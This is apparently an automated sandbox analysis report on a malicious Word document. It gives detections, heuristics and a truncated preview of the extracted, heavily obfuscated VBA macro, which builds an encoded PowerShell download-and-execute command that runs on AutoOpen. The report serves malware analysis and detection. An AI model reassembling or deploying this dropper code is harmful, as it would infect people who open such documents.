Verdict: MALICIOUS
Risk Score: 142

Malware Insights
MITRE ATT&CK: T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen function runs when the document is opened; it assembles and executes a Base64-encoded PowerShell command. That command is built to download and execute a second-stage payload, as indicated by the obfuscated string and the use of PowerShell. The ClamAV detection name 'Doc.Dropper.Valyria-6666905-0' further supports its role as a dropper.
Heuristics (5)

- ClamAV: Doc.Dropper.Valyria-6666905-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6666905-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43851 bytes |

SHA-256: f7637633bc6f09348ecd057d3a014b9009dfefb0a2bdd3ef38e7ea4a9221d5c1

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "RElXjaEFEsoadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "kDwtSJIPjsB"
Function QuhNsEsSuK()
On Error Resume Next
ckKFr = "oPIZEc"
VarType CByte(4)
IsArray Sin(PqzMhv - cGXvN - 20415 / DubBwk)
lawzOpMYozv = "mD " + "/" + "v ^ ^ " + "/r " + CStr(Chr(DrlXfAmbVQnKz + nQOqzqoZsUi + 34 + kkGTPVtwsvEB + pzwdTfuWFUv)) + " SET " + " "
IsArray Val(jOoAfa)
ckKFr = CDec(HwPiUi)
IsArray Sqr(62)
SwwHsDmj = "^ " + "rX" + "B^" + "Q^=po^w" + "^e" + "rs^" + "h^e^l" + "l^ ^-" + "^" + "e^ JA" + "^" + "BRA^Gw" + "^A^bg^"
ckKFr = 6592386
VarType Str(aztYzY)
VarType TimeValue(JIHGT * jEIrm * MvcXif / 29611)
lnsFV = "A9" + "AG^4A" + "^" + "ZQ" + "^" + "B.^AC0A" + "b^w^B" + "]A^"
VarType Rnd(qTElSK)
IsArray Atn(565)
IsArray 8773
bWJdLoGa = "G^oAZ^" + "QBjA^" + "_^" + "Q^AI^" + "AB^" + "OAG^'^" + "Ad^" + "A"
ckKFr = "bSGER"
ckKFr = Int(5)
IsArray Second(GzAit)
SuHRAzOGS = "Au^" + "A/^\^" + "A^Z^QB" + "]^AE" + "^,^Ab" + "^" + "A^B^p" + "A" + "^" + "G'^Ab" + "g" + "B0"
VarType 115
IsArray Cos(60)
IwwdC = "^A^2s" + "^A^J" + "A" + "BNA/I^" + "AR^QA9" + "^AC" + "\^A^aA"
IsArray CDate(4301)
IsArray 340
IsArray 2365
dBUVFIT = "^" + "B0" + "A^_^QA^" + "\A^A^6A" + "C^8^A)^" + "w^B" + "^k^AG^" + "8^Ab"
QuhNsEsSuK = lawzOpMYozv + SwwHsDmj + lnsFV + bWJdLoGa + SuHRAzOGS + IwwdC + dBUVFIT
VarType Str(227283539)
IsArray 845
End Function
Function TlduaiiHi()
On Error Resume Next
ckKFr = Second(72058 * cSpElc - 55921 - IspGO)
VarType LCase(VrZJN)
IsArray TimeValue(qtHaQY)
NbMSQ = "^Q^Bl" + "^A^_,Ad" + "^A" + "BpAG^," + "^A,gA" + "^x" + "AC4A^" + "[^wBv" + "A" + "G^0" + "^A" + ")w"
IsArray 294798985
IsArray 3
IsArray Sin(jIroHw)
LEGZmGR = "B^" + "I" + "A^G^'AV" + "g" + "^BJA"
ckKFr = Rnd(ZRXbGY)
VarType "TtsUDs"
rddnhn = "2Q^A^'" + "ABA" + "^AGgA" + "^d" + "^A^B^" + "0A^_" + "AAO^g^" + "A" + "v"
IsArray TimeValue(604)
VarType Tan(134965962)
NpzjcLMP = "AC^" + "8A^b^A" + "Bh^A" + "_^,A^Z" + "QB^yAC" + "^0" + "^A[^w^"
ckKFr = "KEnEZ"
ckKFr = TimeValue(25)
oGmVH = "BvA^2" + "I" + "^" + "A)^g^Bj" + "^AG8Ab" + "QAu^" + "A" + "^" + "_^AAbA"
ckKFr = Month(zKJGjK + zPTllj)
IsArray "lzvjVd"
IsArray Round(sLFwV)
ocRjsJA = "^" + "AvA" + "^2^AA" + "Nw" + "B^_A2" + "QAV^AA4" + "A2," + "^A^Q^A^" + "B^o" + "A"
ckKFr = "LqsWi"
VarType 9616
ckKFr = "WiiWw"
tZDlcTZM = "_^Q^Ad^" + "A" + "^B" + "^" + "w^A^" + "2o^" + "A)w^A" + "vA^G" + "sA^\QB" + "zAC^4^A"
IsArray "TbMOzO"
VarType "MYMKzo"
ZrqSiX = "b^" + "Q^B" + "^l^A" + "C" + "8A," + "Q^B3^" + "A" + "^2[A^e" + "^"
TlduaiiHi = NbMSQ + LEGZmGR + rddnhn + NpzjcLMP + oGmVH + ocRjsJA + tZDlcTZM + ZrqSiX
ckKFr = "jQnRot"
VarType CBool(26829 / ZuqNd)
End Function
Function rHfAPtqzw()
On Error Resume Next
IsArray "iaIjkF"
VarType CByte(9673 * CHnAz * 50146 - KKWDWt)
IsArray Sin(94)
hjojizCi = "QBXA^_" + "^g^" + "A^" + "\A^BA" + "AG^g" + "^AdA^"
IsArray 4
ckKFr = CByte(418)
IsArray 11
IsHPkaOJmPm = "B" + "0A" + "^_AAO^g" + "AvA" + "C8^A" + "b^Q^" + "B^l^A" + "^G^"
ckKFr = 24
IsArray Atn(16059151)
VarType CDate(tumCXa)
JJvfWQFBCfp = "Q^Aa^" + "QB" + "v^AG^" + "4^A" + ")g^B]AG" + "^EA)w" + "^BuA" + "_"
ckKFr = Second(86399 - SmtMW + 18190 + FTGiU)
VarType 8
ckKFr = "DXkzw"
jVGXKksXm = "o" + "A^e" + "^" + "g^A^y" + "^A/,A"
ckKFr = Int(jOrCi)
ckKFr = "ZKbHaV"
tzkMvNu = "Q^ABoA^" + "_^QA" + "d^ABw^" + "A" + "2oA)w^A" + "vA_^" + "g^A^bg" + "^AtAC" + "0A^Z^Q"
VarType Atn(apwTC)
IsArray "bTETL"
IsArray LCase(XXRnMj + OiDzKa)
HzwfpGqbZi = "^AxA^" + "G^E^" + "A^Z^w" + "B^t^" + "A^G" + ",A" + "Z^w^Bh" + "A" + "G^\" + "AZ^A" + "^Br^"
rHfAPtqzw = hjojizCi + IsHPkaOJmPm + JJvfWQFBCfp + jVGXKksXm + tzkMvNu + HzwfpGqbZi
ckKFr = Str(nAjXcQ + TjwBR * CFbDqT - rEnTNl)
IsArray Atn(2)
End
```

... (truncated)